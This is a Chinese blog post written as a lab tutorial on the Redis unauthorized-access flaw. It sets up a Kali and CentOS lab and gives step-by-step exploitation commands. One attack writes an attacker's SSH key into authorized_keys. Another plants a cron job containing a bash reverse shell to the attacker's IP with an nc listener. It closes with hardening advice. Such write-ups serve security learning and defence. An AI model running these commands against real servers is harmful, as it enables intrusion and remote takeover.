reids未授权漏洞学习

已于 2023-07-20 14:12:09 修改
阅读量372 收藏
点赞数
文章标签: web安全
于 2023-07-09 20:03:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47063945/article/details/131619561
版权
文章详细介绍了Redis未授权访问漏洞的原理、危害、影响版本,以及如何利用该漏洞进行Webshell植入、SSH公钥写入和crontab反弹shell。同时,文中给出了漏洞修复建议,包括限制IP登录、设置密码认证和修改配置文件权限。
摘要由CSDN通过智能技术生成

文章目录

redis是什么

redis是完全开源的,遵守BSD开源协议的,高性能的key-value数据库。

BSD协议:是一种开源协议,给予了源代码使用者很大的自由,允许自由的使用,修改源代码,并将修改后的代码作为开源或者专有软件再发布,但是需要遵守一定的原则:
(1)若再发布的产品中包含源代码,则在源代码中必须带有原来代码中的BSD协议
(2)若发布的只是二进制类库/软件,则需要在类库/软件的文档和版权声明中包含原来代码中的BSD协议
(3)不可以用开源代码的作者/机构名字和原来产品的名字做市场推广
也就是说,BSD协议是针对开源应用的一个约定熟成的规定,我们可以很自由得使用开源应用包括源代码在内的相关内容,但是也需要尊重代码作者的著作权,因此需要在使用的时候需要遵守一定的原则。

key-value数据库:是一种非关系数据库,使用简单的键值方法来存储数据,将数据存储为键值对集合,其中键作为唯一标识符,并且键和值都可以是从简单对象到复杂对象的任何内容。键值数据库是高度可分区的,允许以其他类型的数据库无法实现的规模进行水平扩展。

redis未授权漏洞原理

  1. redis默认绑定0.0.0.0:6379端口,并且没有添加防火墙规则或其他相关安全策略,redis服务直接暴露在公网,导致任意用户未授权访问redis服务
  2. redis默认密码认证为空,导致任意用户未授权登录redis服务,对数据进行修改

redis未授权漏洞危害

  1. 攻击者未授权访问redis服务并登录读取信息导致敏感信息泄露
  2. 攻击者未授权访问redis服务并登录写入后门程序
  3. 当redis以root身份运行时,攻击者未授权访问redis服务并登录写入攻击者生成的ssh公钥文件,进而攻击者可以使用对应的私钥通过ssh直接登录受害者服务器

ssh登录原理:
(1)口令验证:既账号密码登录
(2)密钥验证:既基于公钥密码的认证方式,公钥和私钥成对唯一匹配,使用公钥加密后只能用与之匹配的私钥进行解密,反之亦然

在这里插入图片描述

redis密钥验证登录流程如上图所示
(1)客户端生成公私钥对并将公钥信息拷贝给服务器
(2)客户端向服务器发起公钥认证请求并附带自己的相关信息
(3)服务端根据客户端相关信息检索是否存在与之匹配的公钥,没有则拒绝登录;有则使用该公钥对一个随机的256位的字符串进行加密并发送给客户端
(4)客户端使用私钥进行解密得到字符串并生成字符串的一个md5值发给服务端
(5)服务端对本地字符串以同样加密算法生成md5值并与客户端发来的md5值进行对比,一样则允许登录,不一样则拒绝登录
(6)随后双方进行加密通信

redis未授权漏洞影响版本

redis 2.x, 3.x, 4.x, 5.x

redis未授权漏洞靶场搭建

这里以kali作为攻击机,centos7作为靶机,我们使用kvm虚拟机来搭建靶机环境

  1. 我们使用kvm虚拟化技术来搭建靶机,关于kvm虚拟化技术的介绍可以参考这篇文章,根据文章中搭建桥接模式KVM虚拟机的步骤搭建好centos7的KVM虚拟机,由于使用的是centos7的minimal版本镜像,因此安装过程只能选择最小化安装,安装完成后使用vnc连接进入centos7的KVM虚拟机界面

在这里插入图片描述

  1. 由于是最小化安装,很多东西都需要我们重新下载安装,执行以下命令安装后续操作步骤所需要的工具
yum update  --  更新yum源
yum install wget  --  安装wget工具
cd /etc/yum.repos.d/  --  cd到yum源所在的目录
cp /CentOS-Base.repo /CentOS-Base-repo.bak  --  备份当前yum源
wget http://mirrors.aliyun.com/repo/Centos-7.repo  --  使用wget下载阿里云yum源
yum clean all  --  清除旧包
mv Centos-7.repo CentOS-Base.repo  --  把下载下来的阿里云repo文件设置成为默认源
yum makecache  --  生成阿里云yum源缓存
yum update  --  更新yum源
yum install gcc  --  安装gcc工具
yum install vim  --  安装vim工具
yum install net-tools  --  安装net-tools工具,使用ifconfig命令
  1. 执行以下命令安装redis
cd /home  --  cd到主目录下
wget http://download.redis.io/releases/redis-3.2.11.tar.gz  --  从官网下载redis源码压缩包
tar -zxf redis-3.2.11.tar.gz  --  在当前目录下解压缩redis压缩包
cd redis-3.2.11
make  --  编译执行
  1. 执行以下命令配置redis
cd src
# 将​redis-server​​和​​redis-cli​​拷贝到/usr/bin目录,以后可以直接使用redis-server和redis-cli命令而不需要进入到redis的安装目录
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ..  --  返回redis安装包根目录
cp redis.conf /etc
vim /etc/redis.conf  --  对redis.conf文件做如下修改

在这里插入图片描述

在这里插入图片描述

  1. 执行以下命令启用ssh服务
systemctl start sshd  --  启用ssh服务
systemctl enable sshd  --  设置ssh服务开机自启
systemctl status sshd  --  查看ssh服务的状态
  1. 在kali攻击机上同样按照上述步骤安装redis服务并开启ssh服务
# kali上默认装有ssh服务,但是需要进行配置修改
vim /etc/ssh/sshd_config  --  修改ssh服务的配置文件
将#PasswordAuthentication no的注释去掉,并且将NO修改为YES#PermitRootLogin without-password的注释去掉,并修改为PermitRootLogin yes
service ssh start  --  启用ssh服务
service ssh status  --  查看ssh服务状态
update-rc.d ssh enable  --  设置ssh服务开机自启
  1. 测试网络连接情况,攻击机和靶机相互能ping通

在这里插入图片描述

在这里插入图片描述

  1. 靶机开启redis服务,攻击机尝试使用redis客户端免密登录靶机redis服务器,报错如下

在这里插入图片描述

# 靶机使用修改后的配置文件开启redis服务
redis-server /etc/redis.conf
# 攻击机使用redis客户端登录靶机redis
redis-cli -h 192.168.204.142  --  报错
# 查看靶机防火墙状态
systemctl status firewalld  --  发现为active状态
# 关闭靶机防火墙
systemctl stop firewalld.service
# 再次查看靶机防火墙状态
systemctl status firewalld  --  发现为inactive状态
# 重新使用修改后的配置文件开启靶机redis服务
redis-server /etc/redis.conf
# 攻击机使用redis客户端登录靶机redis
redis-cli -h 192.168.204.142  --  成功登录

在这里插入图片描述

redis未授权漏洞利用姿势

利用原理

漏洞利用的不同姿势的原理都是类似的,都是通过修改靶机redis的备份路径为目标路径,修改靶机redis的备份文件名为目标文件名,通过向靶机redis缓冲区中以键值对的方式写入目标内容,再保存,即可将目标内容以目标文件名的形式写入到目标路径,具体可以参考ssh公钥登录的具体步骤进行体会

利用redis未授权访问登录写入webshell接管站点

利用条件

  1. 目标开启了web服务器,并且知道web路径(可以利用phpinfo或者错误暴路径等)
  2. 需要具有读写增删改查权限

由于本机并没有web服务器因此无法做演示,可看参考文章3、4、5

利用redis未授权访问登录写入SSH公钥实现SSH登录

利用原理

由于redis是一个键值对数据库,在攻击机未授权登录靶机redis服务后,可以将攻击机的公钥作为value,key值随意,通过修改数据库的默认备份路径为/root/.ssh,修改默认的缓冲文件名为authorized_keys,把缓冲区的数据保存到备份路径下的authorized_keys文件中,这样就可以把攻击者公钥写入靶机服务器端的/root/.ssh目录下,而该目录又是ssh默认的存放ssh公钥的位置

利用条件

  1. 服务端的redis连接存在未授权,在攻击机上能用redis-cli直接登录连接,并且未登录验证
  2. 服务端存在.ssh目录并且有写入的权限

利用步骤

  1. 执行以下命令在攻击机的/root/.ssh/目录下生成一个公钥文件
cd /root/.ssh
ssh-keygen -t rsa  --  连续按三次回车完成公钥生成

在这里插入图片描述

  1. 执行以下命令将生成的公钥导入到key.txt文件中,再把key.txt文件内容写入到服务端redis的缓冲里
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/key.txt  --  前后用`\n`换行,避免和redis里其他缓存数据混合,-e参数指定将字符串中的转义字符转换为相应的特殊字符
cat /root/.ssh/key.txt | redis-cli -h 192.168.204.142 -x set pub  --  管道符`|`会将前一个命令的输出作为后一个命令的输入进行执行,-x参数标识从标准输入读取数据作为该命令的最后一个参数,即将公钥写入到靶机redis服务端的pub键对应的value中,此时pub这个键值对是写入到redis服务器的缓冲之中

在这里插入图片描述

  1. 执行以下命令登录靶机的redis服务,修改靶机redis的备份路径为靶机ssh公钥的默认存放目录(一般为/root/.ssh/),修改靶机redis保存缓冲数据中的公钥键值对的备份文件名为authorized_keys,将缓冲数据保存到靶机服务器硬盘上,从而成功将攻击机的ssh公钥以authorized_keys文件形式写入靶机ssh公钥的默认存放目录中
redis-cli -h 192.168.204.142
config get dir  --  查看redis服务端当前的备份路径
config set dir /root/.ssh  --  修改redis的备份路径,报错靶机上没有/root/.ssh目录
# ctrl+C  --  关闭靶机redis服务
ssh localhost  --  执行命令输入yes会自动生成/root/.ssh目录
redis-server /etc/redis.conf  --  启动靶机redis服务
config set dir /root/.ssh  --  成功修改redis的备份路径
config set dbfilename authorized_keys  --  修改靶机redis保存缓冲数据中的公钥键值对的备份文件名为authorized_keys
save  --  将缓冲数据保存到靶机服务器硬盘上,即将攻击机的ssh公钥以authorized_keys文件形式写入靶机ssh公钥的默认存放目录中
  1. 执行以下命令攻击机使用ssh成功连接靶机
ssh 192.168.204.142

在这里插入图片描述

在crontab中写入定时任务,反弹shell

利用条件

只能在centos上使用,无法在ubuntu上使用,因为默认的redis写文件是644权限,但ubuntu执行定时任务文件/var/spool/cron/crontabs/<username>的权限必须是600,否则报错,而centos在权限644下可以执行定时任务文件/var/spool/cron/<username>

利用步骤

  1. 执行以下命令在攻击机监听端口
nc -lnvp 1234

在这里插入图片描述

  1. 执行以下命令连接crontab反弹shell
redis-cli -h 192.168.204.142  --  连接到靶机redis服务
SET test "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.204.143/1234 0>&1\n\n"

上述代码设置了一个名为test的键,其内容为双引号内的内容;前后两个换行避免和其他redis缓冲数据混合

*/1 * * * *是cron的表达式,表示每分钟执行一次任务

/bin/bash -i>&/dev/tcp/192.168.26.120/1234 0>&1表示将’/bin/bash’进程的输入输出重定向到网络套接字192.168.204.143的1234端口,即攻击机的1234端口

config set dir /var/spool/cron  --  修改redis的备份路径
config set dbfilename root  --  修改redis保存缓冲数据的备份文件名
save  --  保存缓冲数据到/var/spool/cron下的root文件中

在这里插入图片描述

经过一分钟左右可以收到反弹的shell

在这里插入图片描述

redis未授权漏洞修复建议

  1. redis配置文件绑定IP,限制IP登录
  2. 修改默认监听端口,更好地隐藏服务
  3. 开启redis安全认证并设置复杂的密码
  4. 禁止使用root权限启动
  5. 修改redis配置文件的访问权限,禁止不相关用户访问配置文件

参考文章

  1. 什么是 BSD 协议?. 菜鸟教程. Available at here (Accessed: 9 july 2023).
  2. 什么是键值数据库?. aws. Available at here (Accessed: 9 july 2023).
  3. Redis未授权访问漏洞复现. 博客园. Available at here (Accessed: 9 july 2023).
  4. Redis未授权漏洞复现及利用方式总结. 51CTO博客. Available at here (Accessed: 9 july 2023).
  5. Redis常见漏洞利用方法总结|Redis未授权访问漏洞利用方式. Available at here (Accessed: 20 july 2023).
  6. CentOS更换yum源配置. 博客园. Available at here. Accessed: 19 July 2023.
  7. kali 上开启ssh功能. CSDN. Available at here. Accessed: 19 July 2023.
  8. SSH免密登录以及没有.ssh目录如何办. CSDN. Available at here. Accessed: 20 July 2023.
stone_zer0
关注
[ vulhub漏洞复现篇 ] Celery <4.0 Redis授权访问+Pickle反序列化利用
qq_51577576的博客
10-04 1737
[ vulhub漏洞复现篇 ] Celery <4.0 Redis授权访问+Pickle反序列化利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。这里我们使用redis的队列服务
Redis授权访问
xuanlanxiao的博客
05-10 513
攻击者在授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。可以简单看一下这些,原因很简单,因为centos7自身存在防火墙,会将redis默认端口6379隐藏,不允许外界访问,所以这里kali访问失败,我们关掉centos7的防火墙再试一试。自己搭建的靶场可以拉拽redis压缩包进入虚拟机里。
漏洞复现-rides授权访问
qq_43381463的博客
11-30 763
漏洞复现-rides授权访问
Redis漏洞汇总
Jietewang的博客
08-11 8200
前言 redis是一个key-value存储系统,拥有很强大的功能,目前的普及率很高,reids默认端口是6379。造成为授权漏洞的原因不是逻辑漏洞(:》),是安全配置作限制的原因,如果主机非内网主机,且拥有互联网IP那么redis大概率存在授权漏洞,本人遇到的是这样的。 1.授权访问漏洞 redis默认情况是空密码连接,如果在root用户下安装的话,这是十分危险的,有多危险呢?大概( )这么危险。 ...
Redis系列漏洞总结
NLost
10-21 6477
授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
又见到一个利用redis漏洞的活生生的例子
若鱼的专栏
05-16 2565
见到一个如何利用redis漏洞的活生生的例子,原理大概如下:config set  dir /var/spool/cronconfig set dbfilename root新建cron.txt :*/1 * * * * ls&gt;/tmp/ls.txt(echo -e "\t\n";cat cron.txt ;echo -e "\n\t") &gt; cron2.txtcat cron2.tx...
Redis授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 2621
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
Redis授权漏洞复现及利用(window,linux)
热门推荐
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2861
Redis授权访问漏洞利用方式总结(含靶场搭建)
redis授权访问漏洞的三种场景复现以及加固思路
小王的储物间
02-10 1766
redis是一个非常快速的,开源的,支持网络,可以基于内存,也可以持久化的日志型,非关系型的键值对数据库。并提供了多种语言的api。有java,c/c++,c#,php,JavaScript,perl,object-c,python,ruby,erlang等客户端,使用方便。redis授权访问漏洞是一个由于redis服务器版本较低,并设置登陆密码所导致的漏洞,攻击者可以直接利用redis服务器的ip地址和端口完成对redis服务器的远程登陆,对目标服务器完成后续的控制和利用。
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
xiaobai_20190815的博客
03-09 1189
Redis沙盒逃逸漏洞 RCE(CVE-2022-0543)复现+getshell
Redis授权访问获取shell
R3332136304的博客
12-23 682
Redis 授权访问 Redis默认配置身份鉴别,当端口侦听在公网上时,攻击者可通过Redis授权访问,获取到服务器shell。 上靶场!!! 可以看到服务器开启了两个端口 48965 和 41617,通过搭建 redis 客户端环境,对着两个端口连接测试,发现都可以直接连接到 redis 数据库。 先查看一波,看一下配置保存数据文件的目录,看到是 /var/lib/redis 可以判断是Linux系统主机,而且只有48965端口可以正常使用 看一下保存数据的文件名 通过查看保存文件的所在目录,
Redis安全漏洞影响及加固方法
qq_40770143的博客
10-12 1万+
Redis安全漏洞影响及加固方法 Redis安全漏洞影响: 1、 Redis因配置不当可以授权访问,很容易被攻击者恶意利用。如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录、控制服务器,引发重要数据泄露或丢失,严重威胁用户业务和数据安全,风险极高,业界将此漏洞定位为高危漏洞。 2、 当前业界已暴出多起因Redis漏洞导致主机被入侵、业务中断、数据丢失...
redis漏洞利用
爱测未来团队博客
07-06 9704
前言       说起来redis的安全问题被大众关注也有一些时间了,但是日常生活中还是有很多运维人员不知道redis如何配置会比较安全,一部分安全测试人员对这个漏洞利用不是很熟悉,所以就有了这篇文章。在此之前我第一次遇到这个问题的时候也百度很多前辈的文章看了一下,但是还是觉得过程很繁琐,操作起来不是很方便。我自己就搭建了一个环境做了一次漏洞复现实验,这里把过程记录下来分享给大家,希望安全人员以后...
信息与网络安全需要大数据安全分析
2401_88751384的博客
11-18 297
与此同时,随着安全防御的纵深化,安全监测的内容不断细化,除了传统的攻击监测,还出现了合规监测、应用监测、用户行为监测、性能检测、事务监测,等等,这些都意味着要监测和分析比以往更多的数据。一方面,企业和组织安全体系架构的日趋复杂,各种类型的安全数据越来越多,传统的分析能力明显力不从心;借助大数据安全分析技术,能够更好地解决天量安全要素信息的采集、存储的问题,借助基于大数据分析技术的机器学习和数据挖据算法,能够更加智能地洞悉信息与网络安全的态势,更加主动、弹性地去应对新型复杂的威胁和知多变的风险。
网络安全最新XSS漏洞
anquan2233的博客
11-18 246
​ 目前CS出现XSS漏洞的原因主要是因为CS的客户端可以被HTML渲染,目前已知存在位置为计算机名,username等,因为再前面我们可以自定义上线,所以更改一下这些地方的信息不是难事。首先生成一个裸奔马,然后在被控端打开wireshark并且点击exe上线,我们这里只考虑应用层的包,所以过滤一下,我这里得到4个包。加密函数最多加密117字节,所以会报错,然后我简单的改了下脚本,如下图所示需要自己对照改。到这里就可以利用脚本来达到批量上线的目的了,这里可以利用师傅现成的脚本达到上线的目的。
等保二级需要哪些安全设备?
bocco的博客
11-15 568
同时,还应加强安全管理措施的实施,提高员工的安全意识和能力,共同维护企业的信息安全。这些设备能够实时监测机房内的温湿度、漏水情况,一旦超出预设范围,便会自动报警,及时采取措施,确保服务器在适宜的环境中稳定运行。1. 防火墙:防火墙是网络安全的第一道屏障,能够控制进出网络的数据包,防止授权的访问和恶意攻击。在等保二级中,应部署下一代防火墙,其不仅具备传统防火墙的功能,还集成了入侵防御、防病毒等功能,能够更有效地保护服务器的安全。通过部署日志审计系统,可以及时发现并处理网络中的异常行为,提高网络的安全性。
一些常见网络安全术语
最新发布
Hacker_xingchen的博客
11-18 785
(2)  蜜罐好比是情报收集系统,蜜罐好像是故意让人攻击的目标,引诱黑客前来攻击,所以攻击者如前后,就可以知道攻击方如何得逞的,随时了解对服务器发动的最新攻击和漏洞,还可以通过窃听黑客之间的联系,手机黑客所用的种种工具,并且掌握他们的社交网络。在计算机科学中,社会工程学指的是通过与其他人的合法地交流,来使其心理受到影响,做出某些动作或者透露一些机密信息的方式,这通常被认为是一种欺诈他人以收集信息/行骗和入侵计算机系统的行为,在英美普通法系中,这一行为一般是被认为侵权隐私权的!这是一顶黑帽子的反面。
Redis入门到精通:概念、实战与面试指南
Redis实践与实战集锦涵盖了从Redis的基础知识到高级应用,包括了安装、配置、编程接口、运维和面试准备等多个方面,是一份全面的学习资料。无论是初学者还是经验丰富的开发者,都能从中获取有价值的信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值